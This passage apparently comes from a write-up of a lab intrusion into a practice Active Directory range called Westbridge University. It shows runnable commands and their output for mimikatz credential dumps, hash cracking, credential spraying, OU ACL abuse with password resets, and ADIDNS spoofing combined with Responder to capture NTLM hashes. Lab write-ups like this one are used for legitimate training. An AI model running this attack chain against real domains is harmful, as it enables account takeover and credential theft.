old/text: ,,c3bLtp*rsVrK-w?Vd%r`H>.YGK!6.<GFUL`,6wM&l.I[3&aX```B_<T!7>"P9?EMbX>xDdH).LG)xZyZ,2Cn<J\eccKx5ppkNn[f'78\W2od[z;nm'^p9,
NTLM:fa8ac699d29a6145ddefd012efa6ea60
SHA1:2f63615680f5717fa25bf233d7c143b4003fc024

Secret : DefaultPassword

Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 b8 c3 54 20 04 ff 58 56 e5 6b e9 0f 48 ac 44 4f 09 87 bb f2 ff aa a2 8c f1 94 08 91 41 42 b5 5f 23 b7 ec 57 26 b4 a4 b1
full: b8c3542004ff5856e56be90f48ac444f0987bbf2ffaaa28cf19408914142b55f23b7ec5726b4a4b1
m/u : b8c3542004ff5856e56be90f48ac444f0987bbf2 / ffaaa28cf19408914142b55f23b7ec5726b4a4b1
old/hex : 01 00 00 00 b3 86 c5 50 bf 30 03 f5 86 e8 1a 45 53 a6 2e 9f 11 62 7b ba fb f4 d5 87 22 2a 13 1a 5b f0 5b 26 a3 b4 f6 79 76 42 97 c4
full: b386c550bf3003f586e81a4553a62e9f11627bbafbf4d587222a131a5bf05b26a3b4f679764297c4
m/u : b386c550bf3003f586e81a4553a62e9f11627bba / fbf4d587222a131a5bf05b26a3b4f679764297c4

Secret : M$MachineBoundCertificate
cur/hex : 76 00 00 00 01 00 00 00 03 03 00 00 03 03 00 00 00 00 00 00 17 00 00 00 64 00 00 00 01 00 00 00 01 01 00 00 01 00 00 00 87 fb 16 bf 19 9c 68 e3 41 ee 3e ce a1 e4 bc 17 93 0f f3 8c 84 f3 8d dd 09 25 92 e4 14 27 5c b1 e0 c7 9c 25 10 b3 17 c5 66 51 48 7e 3e 3c 23 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 88 02 00 00 4c 73 61 49 73 6f 41 73 79 6d 6d 65 74 72 69 63 4b 65 79 42 6c 6f 62 2a 7c 39 6b 3c 6e 9f 4d ab 03 86 98 22 22 3c 2b 43 88 b3 95 8a e4 0b 1b 3e 52 4c 2e d7 97 9c f6 70 f0 8a 7f 9a 79 bb 53 1a c8 82 20 e8 82 3d a4 70 ff 44 0a c3 64 a6 73 93 53 da 1d e3 24 58 ff 97 9f 94 ce 64 58 70 7f 09 5b ba 83 d6 7f 6b ef 66 08 87 19 b9 c2 c0 93 a8 08 92 5d ca 44 5e 1d 5e a0 a0 b8 a2 4b 0e 96 0c b7 11 97 30 1d 91 02 f7 6e 57 57 52 d2 45 8e 9a 62 f9 dc 9d 3f 2f 0a 52 af 6c b6 72 17 3e 34 c8 b8 f4 bb a6 d7 b9 5f 6c 59 e1 3b ec cf 93 1f 27 0c c5 ae 9e ca 0c ee 39 0d d0 ea d8 22 00 1f 7c 71 57 d0 c5 1b 29 ff b1 52 3e 35 7a 01 ad 91 d5 4c 4b 03 cd 18 82 cd 8b 62 00 e7 1b 28 32 ff 07 36 2a 67 d6 92 43 7f 84 34 e7 e1 0f 52 44 f4 c9 2b a5 63 08 1a af 98 ab 39 6a d5 4c da 8d ee 52 cd 93 5f 78 0f 39 09 b2 c3 58 8e 95 b8 26 2e d6 43 b2 97 9f 05 af 46 98 4a 1d a3 98 7f 97 14 81 d9 be 11 97 4d 19 04 b5 34 43 93 dc d5 a5 06 99 44 66 34 fd 92 1e a5 2f ef 01 ab f1 c7 3e e6 cd 35 56 f4 fc 72 8c 37 db 7f 8d 68 8d 9b 7e 60 e5 5c 88 78 09 a3 37 ad cc d7 87 a9 43 7a b1 98 8a a7 07 a4 ca 77 91 71 63 64 9b d9 e7 83 43 4b 6a 67 42 ca 8c 4f 0c db 73 63 78 86 cc e0 07 98 69 d6 58 07 ec 47 c5 b9 17 0f 2a 47 a7 17 ff 9e 56 55 71 d4 2e cd b5 30 69 6f f2 ab b8 ae 35 3e 94 0f a1 e6 aa 53 cd 48 7e 87 3b 53 8f 14 9d 85 c7 35 6a 02 2c 51 1a a3 d9 96 5d ac 1d 61 5b 30 44 2d 56 28 81 81 64 07 b0 dd a3 9d 57 61 88 92 17 f9 6b 5d a5 7d 87 95 40 67 ed 10 81 8f d1 06 56 00 ef d8 8e ef 21 be e4 30 8b 80 ac 80 a5 e8 2d 43 2e 44 6d d2 d8 92 e9 07 d4 e2 93 c8 60 d0 3d 46 da 83 41 a2 ea 05 19 fe 10 57 4b 9f 03 9a 82 19 b4 35 5a 56 87 12 7a f7 83 6e 08 2d 91 98 58 53 74 1a 21 9c 9f 31 08 dd 91 47 14 81 e0 a3 59 dd 5d a4 e3 98 cb 57 da 2c ab 66 6c 1a 71 cb 39 85 e6 e3 2b e7 13 90 77 50 88 3a 02 68 b2 68 38 0e a0 bd fa a3 32 22 a0 b6 a8 e3 c5 d9 08 63 46 3a d9 50 de 22 1b 1b fd 6a 9c 4f ec 87 d9 21 f2 1c 6d 2e 04 1f 30 6f 82 93 84 a3 d1 e8 4e 63 0d 6a 4c a2 9c 21 37 ee 01 07 0c fc c0 32 d4 ea bb 6f 10 33 10 0b 79 c5 6f 43 fc e2 cd 3e ab 8f 20 00 00 00 01 00 00 00 a1 02 00 00 30 82 02 9d 30 82 01 85 a0 03 02 01 02 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 11 31 0f 30 0d 06 03 55 04 03 0c 06 43 4e 3d 53 51 4c 30 20 17 0d 32 36 30 37 30 33 31 35 34 39 31 31 5a 18 0f 32 31 32 36 30 36 30 39 31 35 34 39 31 31 5a 30 11 31 0f 30 0d 06 03 55 04 03 0c 06 43 4e 3d 53 51 4c 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 b8 83 32 a1 ef b2 54 da 7f 77 82 eb 58 e1 21 45 0f 66 a0 0c a7 50 5b 5e fe 05 3f 89 76 64 ed 69 c1 54 2d 6a 2a 40 88 42 38 c5 48 17 01 c5 b4 05 d5 40 06 cb 37 c5 ed 7a 9a 19 af 4c 71 29 fb 11 12 35 ee a4 3d 6c 24 eb 55 e3 61 0b 63 f9 97 70 42 aa f2 52 5c 04 d8 5f 39 05 1c ac 5c fc 17 e3 7f 4d c9 09 51 e7 d4 7c 45 97 23 bb 82 94 68 44 31 ae 00 9c e8 c0 33 e9 9f 42 2b 67 96 36 6f c3 25 14 f3 b2 aa f9 75 bf b1 c3 fe 7a 77 cd f4 5f 12 ae d7 1e b7 7e b7 82 14 71 54 15 4e aa 14 5d a2 a2 1d dc 2d c0 69 06 9f b8 5d 5d e7 70 fc d6 42 f4 71 b9 ce 61 2a 2a 96 32 0b 80 ca 58 9e bd f7 f3 c1 9a e8 47 9e 17 a8 a4 b3 c6 48 9a df 4f 62 73 3a 2c bb 8d 52 3b e7 01 4b e7 d8 ea dc 98 95 f3 8a 50 01 a7 9f 19 1d 27 ef 4c b0 3a 58 74 b0 21 84 d4 f1 66 61 aa 80 fd 61 b1 f2 21 4a 75 02 03 01 00 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 48 4d fd 7c 11 01 29 c9 d0 bc bd 4e 2f 89 be 96 02 48 e8 d5 51 8f e3 15 00 0c 13 66 e4 e9 6e bb a6 7b bf 5e 59 ea ab fe 16 23 ba 53 80 41 6a 74 18 1e c8 ca 10 be 8b 2c cb 94 c0 a8 d8 f3 de 76 da 97 8d 91 8e 27 cf 2f 75 98 c0 8c 70 bb 24 ff fe d4 a6 d0 10 a2 6d 36 01 cb b5 78 90 07 52 5b 8f 9d da e5 66 63 bb 2a 02 69 54 9a 32 a9 86 75 d4 31 7a 4d 2e f3 b1 5f 51 78 6a 31 be 66 8c 07 0a 33 52 1b 8d 8f 61 26 70 7a ba a8 a0 ca d5 4f 4d 31 26 bd 28 d8 be 88 41 9a 89 8a aa 54 22 e5 61 ea c4 32 14 81 2d 52 07 cf 0e 40 6e 07 a7 44 b2 9f e7 b6 ec 16 38 71 7b f2 1d 4b 90 0c 43 90 c0 dd f4 a2 cf 03 11 6c 99 a4 84 69 2d 61 19 1f db 42 ef b4 7e fd 09 72 64 ff bd a5 34 4e 00 5b 1c 1a ef f9 66 d5 e3 e2 e0 bf 95 d1 ba 5e be 14 7a f3 94 ee ac 98 5c 7f 1b de c4 bb f4 6c 45 df

Secret : NL$KM
cur/hex : d6 f9 1e be 20 95 21 6a 88 22 1f 5c 92 ce 2c 8a bb cf 2c 38 59 53 a4 3a ef a0 03 da ea a5 a8 cf 0e 6f 91 92 02 3e 5b 45 40 e2 c7 a8 d5 da 8b 11 6d 77 6b 5f 3f 78 48 12 0f bf a8 ce 06 c2 c6 7c
old/hex : d6 f9 1e be 20 95 21 6a 88 22 1f 5c 92 ce 2c 8a bb cf 2c 38 59 53 a4 3a ef a0 03 da ea a5 a8 cf 0e 6f 91 92 02 3e 5b 45 40 e2 c7 a8 d5 da 8b 11 6d 77 6b 5f 3f 78 48 12 0f bf a8 ce 06 c2 c6 7c

Secret : _SC_MSSQLSERVER / service 'MSSQLSERVER' with username : WESTBRIDGE\svc_mssql
cur/text: sqls3rv3r

mimikatz(commandline) # lsadump::cache
Domain : SQL
SysKey : dcb4ae7d68daa0e68346ffc5931813a4

Local name : SQL ( S-1-5-21-1125571547-1798134610-920220621 )
Domain name : WESTBRIDGE ( S-1-5-21-1978613116-3728955385-531918137 )
Domain FQDN : westbridge.hsm

Policy subsystem is : 1.20
LSA Key(s) : 1, default {5b8d7e87-90ef-5a67-e787-4124c7f338e6}
[00] {5b8d7e87-90ef-5a67-e787-4124c7f338e6} bcbdac6eb638607d18ccd016a14a7f4aa2855d70ea1c3247678862906e0d7b26

* Iteration is set to default (10240)

[NL$1 - 7/26/2026 1:28:34 PM]
RID : 000024f3 (9459)
User : WESTBRIDGE\svc_mssql
MsCacheV2 : 1ec4140de5ee57508d19c407047b884e

mimikatz(commandline) # exit
Bye!
PS C:\Temp>

Pulled out Westbridge.bak from MSSQL server’s directory and grepped it for stored NT hashes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ file Westbridge.bak
Westbridge.bak: Windows NTbackup archive NT, with file catalog, soft size 8*512, name: Westbridge_BackupMicrosoft SQL Server, software (0x1200): Microsoft SQL Server

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ strings -e l -n 4 Westbridge.bak | grep -E "[a-f0-9]{32}"
m.thompson3cc31cd246149ae3df079241e71e98f6SQL AdministratorWestbridgedboEnabledWestbridge MSSQL management account record. No password stored in database.0
j.walshd75b2e8cbad7438d0e17c06d7049efc9Database OperatorWestbridgedboEnabledOperational database account record. Password field intentionally empty.
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ strings -e l -n 6 Westbridge.bak | grep -iE "@westbridge|\.hsm"
WB-2026-1001Emily Carteremily.carter@westbridge.hsmComputer Science2026Paid0&
WB-2026-1002Michael Reedmichael.reed@westbridge.hsmComputer Science2026Partial0&
WB-2026-1003Sarah Harrisonsarah.harrison@westbridge.hsmInformation Technology2026Paid0&
WB-2026-1004Daniel Cooperdaniel.cooper@westbridge.hsmInformation Technology2026Pending0&
WB-2026-1005Olivia Bennettolivia.bennett@westbridge.hsmBusiness Administration2026Paid0&
WB-2026-1006Ethan Brooksethan.brooks@westbridge.hsmInformation Technology2026Partial0&
WB-2026-1007Grace Fostergrace.foster@westbridge.hsmComputer Science2026Paid0&
WB-2026-1008Noah Collinsnoah.collins@westbridge.hsmComputer Science2026Paid0&
WB-2026-1009Sophia Walkersophia.walker@westbridge.hsmBusiness Administration2026Partial0&
WB-2026-1010Liam Turnerliam.turner@westbridge.hsmInformation Technology2026Paid0&
WB-2026-1011Chloe Mitchellchloe.mitchell@westbridge.hsmInformation Technology2026Partial0&
WB-2026-1012Benjamin Scottbenjamin.scott@westbridge.hsmComputer Science2026Pending0&
WB-2026-1013Ava Robinsonava.robinson@westbridge.hsmComputer Science2026Paid0&
WB-2026-1014Mason Hughesmason.hughes@westbridge.hsmBusiness Administration2026Pending0&
WB-2026-1015Ella Morganella.morgan@westbridge.hsmBusiness Administration2026Paid

Saved that NT hash and used that to crack using john

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ john ntt.txt -w=rockyou_costum.txt --format=Raw-MD5
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
Pa$$w0rd (?)
1g 0:00:00:00 DONE (2026-08-24 11:52) 100.0g/s 500400p/s 500400c/s 807600C/s mmm888..sexcluff
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

m.thompson validates domain-wide - our first real domain user:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc smb 10.0.10.5 -u m.thompson -p 'Pa$$w0rd'
SMB 10.0.10.5 445 DC [+] westbridge.hsm\m.thompson:Pa$$w0rd
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc smb 10.0.10.15 -u m.thompson -p 'Pa$$w0rd' --share Students -M spider_plus
SMB 10.0.10.15 445 FILES [*] Windows 11 / Server 2025 Build 26100 x64 (name:FILES) (domain:westbridge.hsm) (signing:True) (SMBv1:None)
SMB 10.0.10.15 445 FILES [+] westbridge.hsm\m.thompson:Pa$$w0rd
SPIDER_PLUS 10.0.10.15 445 FILES [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.0.10.15 445 FILES [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.0.10.15 445 FILES [*] STATS_FLAG: True
SPIDER_PLUS 10.0.10.15 445 FILES [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.0.10.15 445 FILES [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.0.10.15 445 FILES [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.0.10.15 445 FILES [*] OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB 10.0.10.15 445 FILES [*] Enumerated shares
SMB 10.0.10.15 445 FILES Share Permissions Remark
SMB 10.0.10.15 445 FILES ----- ----------- ------
SMB 10.0.10.15 445 FILES ADMIN$ Remote Admin
SMB 10.0.10.15 445 FILES C$ Default share
SMB 10.0.10.15 445 FILES IPC$ READ Remote IPC
SMB 10.0.10.15 445 FILES IT-Share IT Internal - Administrators Only
SMB 10.0.10.15 445 FILES Scripts File Server Support members only
SMB 10.0.10.15 445 FILES Students READ Public student resources and academic documents
SPIDER_PLUS 10.0.10.15 445 FILES [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/10.0.10.15.json".
SPIDER_PLUS 10.0.10.15 445 FILES [*] SMB Shares: 6 (ADMIN$, C$, IPC$, IT-Share, Scripts, Students)
SPIDER_PLUS 10.0.10.15 445 FILES [*] SMB Readable Shares: 2 (IPC$, Students)
SPIDER_PLUS 10.0.10.15 445 FILES [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.0.10.15 445 FILES [*] Total folders found: 18
SPIDER_PLUS 10.0.10.15 445 FILES [*] Total files found: 13
SPIDER_PLUS 10.0.10.15 445 FILES [*] File size average: 5.97 MB
SPIDER_PLUS 10.0.10.15 445 FILES [*] File size min: 1.31 MB
SPIDER_PLUS 10.0.10.15 445 FILES [*] File size max: 24.91 MB

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc rdp 10.0.10.5 10.0.10.15 10.0.10.20 10.0.10.25 -u m.thompson -p 'Pa$$w0rd'
RDP 10.0.10.5 3389 DC [*] Windows 10 or Windows Server 2016 Build 26100 (name:DC) (domain:westbridge.hsm) (nla:True)
RDP 10.0.10.5 3389 DC [+] westbridge.hsm\m.thompson:Pa$$w0rd
RDP 10.0.10.15 3389 FILES [*] Windows 10 or Windows Server 2016 Build 26100 (name:FILES) (domain:westbridge.hsm) (nla:True)
RDP 10.0.10.15 3389 FILES [+] westbridge.hsm\m.thompson:Pa$$w0rd
RDP 10.0.10.20 3389 SQL [*] Windows 10 or Windows Server 2016 Build 26100 (name:SQL) (domain:westbridge.hsm) (nla:True)
RDP 10.0.10.20 3389 SQL [+] westbridge.hsm\m.thompson:Pa$$w0rd
RDP 10.0.10.25 3389 HELPDESK-WS [*] Windows 10 or Windows Server 2016 Build 26100 (name:HELPDESK-WS) (domain:westbridge.hsm) (nla:True)
RDP 10.0.10.25 3389 HELPDESK-WS [+] westbridge.hsm\m.thompson:Pa$$w0rd
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

Phase 4 - FILES: OU-relocation ACL abuse, then constrained delegation

4a. GenericAll on an OU → move a target into it

A fresh BloodHound-CE collection as m.thompson surfaces the pivotal edge:

1
2
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodhound-ce-python -u m.thompson -p 'Pa$$w0rd' -d westbridge.hsm -dc DC.westbridge.hsm -ns 10.0.10.5 -c all --zip


We exploited an OU-level delegated GenericAll permission by moving two accounts into the OU controlled by m.thompson, thereby bringing those accounts under his administrative control.

Moved c.wilson from IT TIER1 OU to STUDENTS OU.

1
2
3
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD --host DC.westbridge.hsm -d westbridge.hsm -u m.thompson -p 'Pa$$w0rd' set object 'CN=c.wilson,OU=IT TIER1,DC=westbridge,DC=hsm' distinguishedName -v 'CN=c.wilson,OU=STUDENTS,DC=westbridge,DC=hsm'
[+] CN=c.wilson,OU=IT TIER1,DC=westbridge,DC=hsm's distinguishedName has been updated

Moved r.anderson from IT TIER1 OU to STUDENTS OU.

1
2
3
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD --host DC.westbridge.hsm -d westbridge.hsm -u m.thompson -p 'Pa$$w0rd' set object 'CN=r.anderson,OU=IT TIER1,DC=westbridge,DC=hsm' distinguishedName -v 'CN=r.anderson,OU=STUDENTS,DC=westbridge,DC=hsm'
[+] CN=r.anderson,OU=IT TIER1,DC=westbridge,DC=hsm's distinguishedName has been updated

After moving the accounts to the target OU, I used m.thompson‘s privileges to reset the passwords of r.anderson and c.wilson.

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD --host DC.westbridge.hsm -d westbridge.hsm -u m.thompson -p 'Pa$$w0rd' set password r.anderson 'Pass123456'
[+] Password changed successfully!
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD --host DC.westbridge.hsm -d westbridge.hsm -u m.thompson -p 'Pa$$w0rd' set password c.wilson 'Pass123456'
[+] Password changed successfully!
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

Once moved to OU=STUDENTS, both accounts inherited m.thompson’s delegated permissions, allowing password resets and full account takeover.

BloodHound - the non-inherited GenericAll from m.thompson onto OU=STUDENTS (both owned):

BloodHound - the freshly-owned r.anderson is a member of File Server Support, which is what opens the Scripts share on FILES:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc smb 10.0.10.15 -u r.anderson -p 'Pass123456' --shares
SMB 10.0.10.15 445 FILES [*] Windows 11 / Server 2025 Build 26100 x64 (name:FILES) (domain:westbridge.hsm) (signing:True) (SMBv1:None)
SMB 10.0.10.15 445 FILES [+] westbridge.hsm\r.anderson:Pass123456
SMB 10.0.10.15 445 FILES [*] Enumerated shares
SMB 10.0.10.15 445 FILES Share Permissions Remark
SMB 10.0.10.15 445 FILES ----- ----------- ------
SMB 10.0.10.15 445 FILES ADMIN$ Remote Admin
SMB 10.0.10.15 445 FILES C$ Default share
SMB 10.0.10.15 445 FILES IPC$ READ Remote IPC
SMB 10.0.10.15 445 FILES IT-Share IT Internal - Administrators Only
SMB 10.0.10.15 445 FILES Scripts READ File Server Support members only
SMB 10.0.10.15 445 FILES Students READ Public student resources and academic documents

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

r.anderson (now in File Server Support) can read the Scripts share on FILES, which holds two scheduled jobs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ smbclient //10.0.10.15/Scripts -U 'westbridge.hsm\r.anderson%Pass123456'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 7 10:49:02 2026
.. DHS 0 Sun Jul 26 10:47:29 2026
installed_updates.ps1 A 998 Tue Jul 7 10:49:02 2026
webserver_monitor.ps1 A 1073 Tue Jul 7 12:32:00 2026

26082299 blocks of size 4096. 16716754 blocks available
smb: \> get webserver_monitor.ps1
getting file \webserver_monitor.ps1 of size 1073 as webserver_monitor.ps1 (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \> get installed_updates.ps1
getting file \installed_updates.ps1 of size 998 as installed_updates.ps1 (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \>

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ ls *.ps1
installed_updates.ps1 webserver_monitor.ps1

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ cat installed_updates.ps1
# installed_updates.ps1
# Lists installed Windows updates

$OutputFile = "$env:TEMP\installed_updates.txt"

"===================================" | Out-File $OutputFile
" Installed Windows Updates" | Out-File $OutputFile -Append
" Generated: $(Get-Date)" | Out-File $OutputFile -Append
"===================================" | Out-File $OutputFile -Append
"" | Out-File $OutputFile -Append

try {
Get-HotFix |
Sort-Object InstalledOn -Descending |
Select-Object HotFixID,
Description,
InstalledBy,
InstalledOn |
Format-Table -AutoSize |
Out-String |
Out-File $OutputFile -Append

Write-Host "Installed updates have been saved to:" -ForegroundColor Green
Write-Host " $OutputFile" -ForegroundColor Cyan
}
catch {
Write-Host "Failed to retrieve installed updates." -ForegroundColor Red
Write-Host $_.Exception.Message -ForegroundColor Yellow
}
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ cat webserver_monitor.ps1
# webserver_monitor.ps1

# Check web server status. Scheduled to run every 1min
# Service Account: svc_webmonitor

Write-Host "Web Server Monitoring - Service Account: svc_webmonitor" -ForegroundColor Cyan

$targets = @(
"webstatus.westbridge.hsm",
"webportal.westbridge.hsm",
"webmonitor.westbridge.hsm"
)

foreach ($target in $targets) {
try {
Write-Host "Checking: $target" -ForegroundColor Gray

$request = Invoke-WebRequest `
-Uri "http://$target" `
-UseDefaultCredentials `
-UseBasicParsing `
-TimeoutSec 3

if ($request.StatusCode -ne 200) {
Write-Host " Warning: $target returned status: $($request.StatusCode)" -ForegroundColor Yellow
}
else {
Write-Host " Status: 200 - OK" -ForegroundColor Green
}
}
catch {
Write-Host " Error: Failed to connect to $target" -ForegroundColor Red
}
}

Write-Host "Monitoring completed - Service: svc_webmonitor" -ForegroundColor Cyan
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

webserver_monitor.ps1 runs as svc_webmonitor every minute and health-checks three hostnames with -UseDefaultCredentials - meaning it will happily authenticate to whatever answers:

1
2
3
4
5
6
# webserver_monitor.ps1  -  Service Account: svc_webmonitor  (scheduled every 1 min)
$targets = @("webstatus.westbridge.hsm","webportal.westbridge.hsm","webmonitor.westbridge.hsm")
foreach ($target in $targets) {
$request = Invoke-WebRequest -Uri "http://$target" -UseDefaultCredentials -UseBasicParsing -TimeoutSec 3
# ...checks $request.StatusCode...
}

None of those three names resolve - but we’re an authenticated domain user, and AD-integrated DNS lets any user add records. So we point all three at our box (ADIDNS spoofing), start Responder, and wait for the scheduled task to walk its NTLM straight into the trap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD --host DC.westbridge.hsm -d westbridge.hsm -u m.thompson -p 'Pa$$w0rd' add dnsRecord webmonitor 192.168.211.2
[+] Adding "webmonitor" to "DC=westbridge.hsm,CN=MicrosoftDNS,DC=DomainDnsZones,DC=westbridge,DC=hsm"
[+] webmonitor has been successfully added

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD --host DC.westbridge.hsm -d westbridge.hsm -u m.thompson -p 'Pa$$w0rd' add dnsRecord webstatus 192.168.211.2
[+] Adding "webstatus" to "DC=westbridge.hsm,CN=MicrosoftDNS,DC=DomainDnsZones,DC=westbridge,DC=hsm"
[+] webstatus has been successfully added

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ bloodyAD --host DC.westbridge.hsm -d westbridge.hsm -u m.thompson -p 'Pa$$w0rd' add dnsRecord webportal 192.168.211.2
[+] Adding "webportal" to "DC=westbridge.hsm,CN=MicrosoftDNS,DC=DomainDnsZones,DC=westbridge,DC=hsm"
[+] webportal has been successfully added

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|


[*] Tips jar:
USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
BTC -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
DHCPv6 [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [192.168.211.2]
Responder IPv6 [fe80::136b:2d1b:b1d8:535b]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]

[+] Current Session Variables:
Responder Machine Name [WIN-KJ1MEB72EQR]
Responder Domain Name [RGZJ.LOCAL]
Responder DCE-RPC Port [46823]

[*] Version: Responder 3.2.2.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>

[+] Listening for events...

[HTTP] NTLMv2 Client : 10.0.10.15
[HTTP] NTLMv2 Username : WESTBRIDGE\svc_webmonitor
[HTTP] NTLMv2 Hash : svc_webmonitor::WESTBRIDGE:7eca8aab9263f4af:22B7FC6EFE4B144E4F1DB62D8CF151D0:01010000000000005086C530EF33DD01D95C4DDA3248B2720000000002000800520047005A004A0001001E00570049004E002D004B004A0031004D00450042003700320045005100520004001400520047005A004A002E004C004F00430041004C0003003400570049004E002D004B004A0031004D0045004200370032004500510052002E00520047005A004A002E004C004F00430041004C0005001400520047005A004A002E004C004F00430041004C00080050005000000000000000000000000020000003E0111B7968D40525AD228ABD63D3A9109B617D7FF917DB128943A05F4CB3B05C4413DC32AF485014FC4F7E5280FB7895F394391B1A0541B4DEBA1326C2DC790A0010000000000000000000000000000000000009003A0048005400540050002F007700650062007300740061007400750073002E0077006500730074006200720069006400670065002E00680073006D000000000000000000
[*] Skipping previously captured hash for WESTBRIDGE\svc_webmonitor
[*] Skipping previously captured hash for WESTBRIDGE\svc_webmonitor
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ john svc_webmonitor-hash -w=rockyou_costum.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
